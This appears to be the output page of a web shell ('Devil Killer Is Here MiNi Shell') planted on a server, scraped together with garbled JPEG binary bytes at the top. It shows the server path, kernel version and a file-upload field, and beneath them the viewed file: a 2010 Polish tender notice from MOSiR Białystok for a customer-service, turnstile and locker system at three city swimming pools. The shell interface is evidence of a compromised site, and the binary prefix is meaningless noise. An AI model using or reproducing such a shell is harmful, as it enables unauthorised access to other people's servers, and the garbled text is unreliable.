JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100512/128234-N-2010.html

<p class="kh_header"><b>Białystok: Dostawa, montaż, instalacja, konfiguracja i uruchomienie
elektronicznego systemu obsługi klienta 
na Pływalniach nr 1, 2 i 3 MOSiR w Białymstoku</b><br>
<b>Numer ogłoszenia: 128234 - 2010; data zamieszczenia: 12.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Włókiennicza 4, 15-465 Białystok, woj. podlaskie, tel. 085 6652870, faks 085 6652871.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa, montaż, instalacja, konfiguracja i uruchomienie
elektronicznego systemu obsługi klienta 
na Pływalniach nr 1, 2 i 3 MOSiR w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Opis przedmiotu zamówienia:

1.	Przedmiotem zamówienia jest:
1)	zakup wraz z dostawą, montażem, instalacją, konfiguracją i uruchomieniem nowego elektronicznego systemu obsługi klienta oraz urządzeń obsługujących szafki ubraniowe wraz z niezbędnymi elementami na Pływalnię Nr 1 przy ul. Włókienniczej 4 w Białymstoku i Pływalnię Nr 2 przy ul. Mazowieckiej 39C w Białymstoku.
2)	zakup wraz z dostawą, montażem, instalacją, konfiguracją i uruchomieniem nowego elektronicznego systemu obsługi klienta oraz szafek ubraniowych wraz z niezbędnymi elementami na Pływalnię Nr 3 przy ul. Stromej 1A w Białymstoku.
2.	Szczegółowy opis przedmiotu zamówienia:
Pływalnia Nr 1 (Pływalnia Sportowa- ul. Włókiennicza 4, Białystok):
1)	komputer PC + Windows XP Professional SP3 (lub Windows 7 Professional) - szt. 2, komputery połączone z jednym głównym serwerem znajdującym się przy ul. Włókienniczej 4 stanowiącym bazę danych,
2)	monitor dotykowy LCD 19 cali - szt. 2, program ESOK musi współpracować z funkcją dotykową wyświetlacza monitora,
3)	drukarka fiskalna - szt. 2,
4)	drukarka igłowa - szt. 2, do drukowania faktur,
5)	szuflada kasowa - szt. 2,
6)	czytnik kart zbliżeniowych i pasków z transponderem (wejście) - szt. 1, zasilany prądem o napięciu bezpiecznym,
7)	czytnik kart zbliżeniowych i pasków z transponderem, typu desktop - szt. 2,
8)	czytnik kart zbliżeniowych i pasków z transponderem tzw. STOP czasu (okolice pkt. kasowego) - szt. 1, zasilany prądem o napięciu bezpiecznym,
9)	czytnik pasków z transponderem (hala basenowa) - szt. 2, zasilany prądem o napięciu bezpiecznym, odporny na zachlapania i trudne warunki występujące na hali basenowej, umożliwiający Klientowi odczyt m.in.:
a)	czasu jaki Klient wykorzystał na Pływalni,
b)	czasu oraz kwoty pieniężnej jaka pozostała do końca wykupionej usługi,
10)	gumowe paski z transponderem - szt. 300, każdy pasek musi posiadać numerację grawerowaną lub tłoczoną (nie dopuszcza się numeracji nadrukowanej), konstrukcja paska powinna umożliwić samodzielną wymianę przez Zamawiającego części i przenoszenie numeracji oraz transpondera w przypadku zużycia,
11)	karty zbliżeniowe z kolorowym nadrukiem ustalonym przez Zamawiającego - szt. 6 000,
12)	bramka obrotowa (tzw. tripod) - szt. 2, zasilana prądem o napięciu bezpiecznym,
13)	bramka uchylna - szt. 1, zasilana prądem o napięciu bezpiecznym,
14)	system ESOK zawierający dodatkowo możliwość:
a)	wykorzystania usługi w dowolnym obiekcie (Pływalnia Nr 1, 2 lub 3) niezależnie od miejsca dokonania jej zakupu- tzw. replikacja,
b)	możliwość rezerwacji usług online, z funkcją określania przez Zamawiającego ilości rezerwacji z danego adresu IP,
c)	możliwość sprawdzania online ilości wykupionych i wolnych miejsc dotyczących wybranych usług,
d)	możliwość zapisu bazy danych dotyczących klientów oraz ewentualnej rozbudowy,
e)	możliwość selekcji danych statystycznych dotyczących wykorzystania obiektów i finansów, z podziałem na dni godziny, rodzaj usługi,
f)	importu bazy danych z programu Hermes,
15)	system stanowiący bazę danych, współpracujący z komputerami Pływalni Nr 1, 2 i 3, który zostanie zainstalowany na istniejącym przy ul. Włókienniczej 4 serwerze MOSiR (Fujitsu Siemens: procesor Xeon X3220, pamięć 2GB, dyski 2x250GB SATA w RAID1 wolne 200GB, system Windows Server 2008 std. x64, zainstalowane oprogramowanie bazodanowe SQL Server 2008 Express Ed.),
16)	punkt kasowy - szt. 1; wymogi:
a)	dwustanowiskowy z możliwością obsługi Klientów przez 1 osobę (kasjera) lub 2 osoby jednocześnie,
b)	powinien zawierać szkło hartowane (certyfikat B) o wysokości minimum 100cm od blatu kasy, oddzielające Klienta od Kasjera,
c)	blaty kasy o grubości minimum 3,6mm umieszczone na wysokości minimum 90 cm od podłoża,
d)	zabudowa odpowiednia do potrzeb rozmieszczenia urządzeń systemu ESOK,
e)	kolor zabudowy punktu kasowego uzgodniony z Zamawiającym,
f)	w punkcie kasowym muszą być zainstalowane 2 zestawy urządzeń głośnomówiących (tzw. interkomy) umożliwiające lepszy kontakt głosowy pomiędzy kasjerami a klientami,
17)	elementy elektroniczne istniejących na obiekcie szafek (szt. 162), umożliwiające współpracę szafek z elektronicznym systemem obsługi klienta; wymogi:
a)	elektromagnetyczne zamki, typu bolcowego otwierane za pomocą karty zbliżeniowej oraz paska z transponderem, zasilane tzw. bezpiecznym napięciem,
b)	czytniki umożliwiające otwieranie szafek za pomocą kart zbliżeniowych oraz pasków z transponderem, wyposażone w wyświetlacz informujący o numerze szafki przyporządkowanej danemu paskowi lub karcie,
c)	możliwość uzyskania informacji o wykorzystaniu danej szafki w określonym czasie oraz uniemożliwienie korzystania z danej szafki z poziomu komputera obsługującego elektroniczny system obsługi klienta,
d)	możliwość awaryjnego otworzenia szafek za pomocą jednej karty, typu master,
e)	możliwość awaryjnego elektrycznego otworzenia szafek bez użycia karty lub paska zbliżeniowego,
f)	awaryjne podtrzymanie zasilania szafek- minimum 0,5 godziny,
g)	Wykonawca dokona numeracji szafek w sposób czytelny, numerację należy wygrawerować lub wtopić, nie dopuszcza się nadruku,
18)	tablica świetlna, przekazująca następujące informacje:
a)	ilość osób korzystających w danym momencie z usług Pływalni,
b)	ilość miejsc wolnych na Pływalni,
c)	rezerwacje usług (godzina, ilość osób),
d)	hasła reklamowe,
19)	UPS - ilość sztuk zapewniająca podtrzymanie działania systemu oraz wszystkich urządzeń (komputery, drukarki, szuflady kasowe, wszystkie czytniki kart zbliżeniowych i pasków transponderowych, bramki obrotowe, bramki uchylne, tablicę świetlną), na czas potrzebny na zakończenie bieżących czynności i zamknięcie systemu, nie mniej niż 0,5 godziny,
20)	okablowanie i inne elementy niezbędne do prawidłowego funkcjonowania systemu wraz z szafkami.
*Dodatkowa informacja - na Pływalni Nr 1 na hali basenowej, wokół niecki znajduje się ogrzewanie podłogowe.

Pływalnia Nr 2 (Pływalnia Kameralna- ul. Mazowiecka 39C, Białystok):
1)	komputer PC + Windows XP Professional SP3 (lub Windows 7 Professional) - szt. 2, komputery połączone z jednym głównym serwerem znajdującym się przy ul. Włókienniczej 4 stanowiącym bazę danych,
2)	monitor dotykowy LCD 19 cali - szt. 2, program ESOK musi współpracować z funkcją dotykową wyświetlacza monitora,
3)	drukarka fiskalna - szt. 2,
4)	drukarka fiskalna - szt. 2, do drukowania faktur,
5)	szuflada kasowa - szt. 2,
6)	czytnik kart zbliżeniowych i pasków z transponderem, typu desktop - szt. 1,
7)	czytnik kart zbliżeniowych i pasków z transponderem tzw. STO czasu - szt. 1, zasilany prądem o napięciu bezpiecznym,
8)	czytnik pasków z transponderem (hala basenowa) - szt. 1, zasilany prądem o napięciu bezpiecznym, odporny na zachlapania i trudne warunki występujące na hali basenowej, umożliwiający Klientowi odczyt m.in.:
a)	czasu jaki Klient wykorzystał na Pływalni,
b)	czasu oraz kwoty pieniężnej jaka pozostała do końca wykupionej usługi,
9)	gumowe paski z transponderem - szt. 100, każdy pasek musi posiadać numerację grawerowaną lub tłoczoną (nie dopuszcza się numeracji nadrukowanej), konstrukcja paska powinna umożliwić samodzielną wymianę przez Zamawiającego części i przenoszenie numeracji oraz transpondera w przypadku zużycia,
10)	karty zbliżeniowe z kolorowym nadrukiem ustalonym przez Zamawiającego- szt. 3 000,
11)	dostosowanie istniejącego punktu kasowego do potrzeb ESOK (m. in. Możliwość obsługi klientów przez 2 kasjerów jednocześnie),
12)	system ESOK zawierający dodatkowo możliwość:
a)	wykorzystania usługi w dowolnym obiekcie (Pływalnia Nr 1, 2 lub 3) niezależnie od miejsca dokonania jej zakupu- tzw. replikacja,
b)	możliwość rezerwacji usług online, z funkcją określania przez Zamawiającego ilości rezerwacji z danego adresu IP,
c)	możliwość sprawdzania online ilości wykupionych i wolnych miejsc dotyczących wybranych usług,
d)	możliwość zapisu bazy danych dotyczących klientów oraz ewentualnej rozbudowy,
e)	możliwość selekcji danych statystycznych dotyczących wykorzystania obiektów i finansów, z podziałem na dni godziny, rodzaj usługi,
f)	importu bazy danych z programu Hermes,
13)	system stanowiący bazę danych, współpracujący z komputerami Pływalni Nr 1, 2 i 3, który zostanie zainstalowany na istniejącym przy ul. Włókienniczej 4 serwerze MOSiR (Fujitsu Siemens: procesor Xeon X3220, pamięć 2GB, dyski 2x250GB SATA w RAID1 wolne 200GB, system Windows Server 2008 std. x64, zainstalowane oprogramowanie bazodanowe SQL Server 2008 Express Ed.),
14)	elementy elektroniczne istniejących na obiekcie szafek (szt. 59), umożliwiające współpracę szafek z elektronicznym systemem obsługi klienta; wymogi:
a)	elektromagnetyczne zamki, typu bolcowego otwierane za pomocą karty zbliżeniowej oraz paska z transponderem, zasilane tzw. bezpiecznym napięciem,
b)	czytniki umożliwiające otwieranie szafek za pomocą kart zbliżeniowych oraz pasków z transponderem, wyposażone w wyświetlacz informujący o numerze szafki przyporządkowanej danemu paskowi lub karcie,
c)	możliwość uzyskania informacji o wykorzystaniu danej szafki w określonym czasie oraz uniemożliwienie korzystania z danej szafki z poziomu komputera obsługującego elektroniczny system obsługi klienta,
d)	możliwość awaryjnego otworzenia szafek za pomocą jednej karty, typu master,
e)	możliwość awaryjnego elektrycznego otworzenia szafek bez użycia karty lub paska zbliżeniowego,
f)	awaryjne podtrzymanie zasilania szafek- minimum 0,5 godziny,
g)	Wykonawca dokona numeracji szafek w sposób czytelny, numerację należy wygrawerować lub wtopić, nie dopuszcza się nadruku,
15)	tablica świetlna, przekazująca następujące informacje:
a)	ilość osób korzystających w danym momencie z usług Pływalni,
b)	ilość miejsc wolnych na Pływalni,
c)	rezerwacje usług (godzina, ilość osób),
d)	hasła reklamowe,
16)	UPS - ilość sztuk zapewniająca podtrzymanie działania systemu oraz wszystkich urządzeń (komputery, drukarki, szuflady kasowe, wszystkie czytniki kart zbliżeniowych i pasków transponderowych, bramki obrotowe, bramki uchylne, tablicę świetlną), na czas potrzebny na zakończenie bieżących czynności i zamknięcie systemu, nie mniej niż 0,5 godziny,
17)	okablowanie i inne elementy niezbędne do prawidłowego funkcjonowania systemu wraz z szafkami.

		Pływalnia Nr 3 (Pływalnia Rodzinna- ul. Stroma 1A, Białystok):
1)	komputer PC + Windows XP Professional SP3 (lub Windows 7 Professional) - szt. 2, komputery połączone z jednym głównym serwerem znajdującym się przy ul. Włókienniczej 4 stanowiącym bazę danych,
2)	monitor dotykowy LCD 19 cali - szt. 2, program ESOK musi współpracować z funkcją dotykową wyświetlacza monitora,
3)	drukarka fiskalna - szt. 2,
4)	drukarka igłowa - szt. 2, do drukowania faktur,
5)	szuflada kasowa - szt. 2,
6)	czytnik kart zbliżeniowych i pasków z transponderem (wejście) - szt. 1, zasilany prądem o napięciu bezpiecznym,
7)	czytnik kart zbliżeniowych i pasków z transponderem, typu desktop - szt. 2,
8)	czytnik kart zbliżeniowych i pasków z transponderem tzw. STOP czasu - szt. 1, zasilany prądem o napięciu bezpiecznym,
9)	czytnik pasków z transponderem (hala basenowa) - szt. 3, zasilany prądem o napięciu bezpiecznym, odporny na zachlapania i trudne warunki występujące na hali basenowej, umożliwiający Klientowi odczyt m.in.:
a)	czasu jaki Klient wykorzystał na Pływalni,
b)	czasu oraz kwoty pieniężnej jaka pozostała do końca wykupionej usługi,
10)	gumowe paski z transponderem - szt. 350, każdy pasek musi posiadać numerację grawerowaną lub tłoczoną (nie dopuszcza się numeracji nadrukowanej), konstrukcja paska powinna umożliwić samodzielną wymianę przez Zamawiającego części i przenoszenie numeracji oraz transpondera w przypadku zużycia, 
11)	karty zbliżeniowe z kolorowym nadrukiem ustalonym przez Zamawiającego - 7 000 szt.,
12)	bramka obrotowa (tzw. tripod) - szt. 1, zasilana prądem o napięciu bezpiecznym,
13)	bramka uchylna - szt. 1, zasilana prądem o napięciu bezpiecznym,
14)	system ESOK zawierający dodatkowo możliwość:
a)	wykorzystania usługi w dowolnym obiekcie (Pływalnia Nr 1, 2 lub 3) niezależnie od miejsca dokonania jej zakupu- tzw. replikacja,
b)	możliwość rezerwacji usług online, z funkcją określania przez Zamawiającego ilości rezerwacji z danego adresu IP,
c)	możliwość sprawdzania online ilości wykupionych i wolnych miejsc dotyczących wybranych usług,
d)	możliwość zapisu bazy danych dotyczących klientów oraz ewentualnej rozbudowy,
e)	możliwość selekcji danych statystycznych dotyczących wykorzystania obiektów  i finansów, z podziałem na dni godziny, rodzaj usługi,
f)	importu bazy danych z programu Hermes,
15)	system stanowiący bazę danych, współpracujący z komputerami Pływalni Nr 1, 2 i 3, który zostanie zainstalowany na istniejącym przy ul. Włókienniczej 4 serwerze MOSiR (Fujitsu Siemens: procesor Xeon X3220, pamięć 2GB, dyski 2x250GB SATA w RAID1 wolne 200GB, system Windows Server 2008 std. x64, zainstalowane oprogramowanie bazodanowe SQL Server 2008 Express Ed.),
16)	punkt kasowy - szt. 1; wymogi:
a)	dwustanowiskowy z możliwością obsługi Klientów przez 1 osobę (kasjera) lub 2 osoby jednocześnie,
b)	powinien zawierać szkło hartowane (certyfikat B) o wysokości minimum 100cm od blatu kasy, oddzielające Klienta od Kasjera,
c)	blaty kasy o grubości minimum 3,6mm umieszczone na wysokości minimum 90 cm od podłoża,
d)	zabudowa odpowiednia do potrzeb rozmieszczenia urządzeń systemu ESOK,
e)	kolor zabudowy punktu kasowego uzgodniony z Zamawiającym,
f)	w punkcie kasowym muszą być zainstalowane 2 zestawy urządzeń głośnomówiących (tzw. interkomy) umożliwiające lepszy kontakt głosowy pomiędzy kasjerami a klientami,  
17)	szafki ubraniowe typu 2S - 200 schowków; wymogi:
a)	wykonane z materiałów odpornych na trudne warunki występujące w szatniach basenowych (laminat HPL w kolorach uzgodnionym z Zamawiającym, profil aluminiowy),
b)	każda komora wyposażona w wieszak na ubrania, zawiasy samodomykajace              (z materiałów odpornych na trudne warunki występujące w szatniach basenowych), otwory wentylacyjne, uchwyt (gałka) do otwierania, 
c)	ławeczki zintegrowane z konstrukcją szafki o wysokości 40cm i głębokości ok. 35cm, profil aluminiowy,
d)	szafki o wymiarach ok. 180 cm wys., 30 cm szer., 40 cm gł. w modułach składających się z dwóch schowków umieszczonych jeden nad drugim,
e)	szafki wyposażone w elektromagnetyczne zamki typu bolcowego otwierane za pomocą karty zbliżeniowej oraz paska z transponderem, zasilane tzw. bezpiecznym napięciem,
f)	szafki wyposażone w czytniki umożliwiające otwieranie szafek za pomocą kart zbliżeniowych oraz pasków z transponderem; czytniki z wyświetlaczem informującym o numerze szafki przyporządkowanej danemu paskowi lub karcie,
g)	możliwość uzyskania informacji o wykorzystaniu danej szafki w określonym czasie oraz uniemożliwienie korzystania z danej szafki z poziomu komputera obsługującego elektroniczny system obsługi klienta,
h)	możliwość awaryjnego otworzenia szafek za pomocą jednej karty lub paska zbliżeniowego,
i)	możliwość awaryjnego elektrycznego otworzenia szafek bez użycia karty lub paska zbliżeniowego,
j)	awaryjne podtrzymanie zasilania szafek- minimum 0,5 godziny,
k)	szafki muszą być ponumerowane czytelnie, numerację należy wygrawerować lub wtopić, nie dopuszcza się nadruku,
18)	tablica świetlna, przekazująca następujące informacje:
a)	ilość osób korzystających w danym momencie z usług Pływalni,
b)	ilość miejsc wolnych na Pływalni,
c)	rezerwacje usług (godzina, ilość osób),
d)	hasła reklamowe,
19)	UPS - ilość sztuk zapewniająca podtrzymanie działania systemu oraz wszystkich urządzeń (komputery, drukarki, szuflady kasowe, wszystkie czytniki kart zbliżeniowych i pasków transponderowych, bramki obrotowe, bramki uchylne, tablicę świetlną), na czas potrzebny na zakończenie bieżących czynności i zamknięcie systemu, nie mniej niż 0,5 godziny,
20)	okablowanie i inne elementy niezbędne do prawidłowego funkcjonowania systemu wraz z szafkami,
	*Dodatkowa informacja - na Pływalni Nr 3 znajduje się ogrzewanie podłogowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.15.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4)	wykaz wykonanych dostaw w ciągu ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, na co najmniej 2 dostawy i montaż ESOK obsługujące minimum 2 oddzielnie położone obiekty komunikujące się ze sobą za pomocą internetu, posiadające wspólny serwer lub funkcję replikacji, o wartości nie mniejszej niż 40 tys. zł netto, z podaniem wartości, terminu i rodzaju dostawy (załącznik nr 3) udokumentowane dokumentami potwierdzającymi należyte wykonanie zamówień,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	formularz ofertowy (załącznik nr 1 do SIWZ),
2)	zestawienie kosztów wykonania zamówienia z podziałem na poszczególne obiekty stosownie do zapisów z pkt. I.1 i I.2
3)	opisy, fotografie (ew. karty katalogowe), potwierdzające, że oferowane dostawy odpowiadają wymaganiom określonym w specyfikacji istotnych warunków zamówienia. Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniami na język polski.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
